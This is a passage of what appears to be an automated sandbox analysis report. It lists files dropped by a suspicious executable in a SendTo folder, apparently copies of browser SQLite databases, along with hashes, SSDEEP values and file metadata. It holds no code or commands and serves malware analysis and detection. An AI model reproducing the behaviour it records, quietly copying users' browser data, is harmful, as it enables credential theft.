                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                          Process:C:\Recovery\RuntimeBroker.exe
                                          File Type:CSV text
                                          Category:dropped
                                          Size (bytes):1281
                                          Entropy (8bit):5.370111951859942
                                          Encrypted:false
                                          SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                          MD5:12C61586CD59AA6F2A21DF30501F71BD
                                          SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                          SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                          SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                          Malicious:false
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):64
                                          Entropy (8bit):1.1510207563435464
                                          Encrypted:false
                                          SSDEEP:3:Nlllullkv/tz:NllU+v/
                                          MD5:6442F277E58B3984BA5EEE0C15C0C6AD
                                          SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
                                          SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
                                          SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
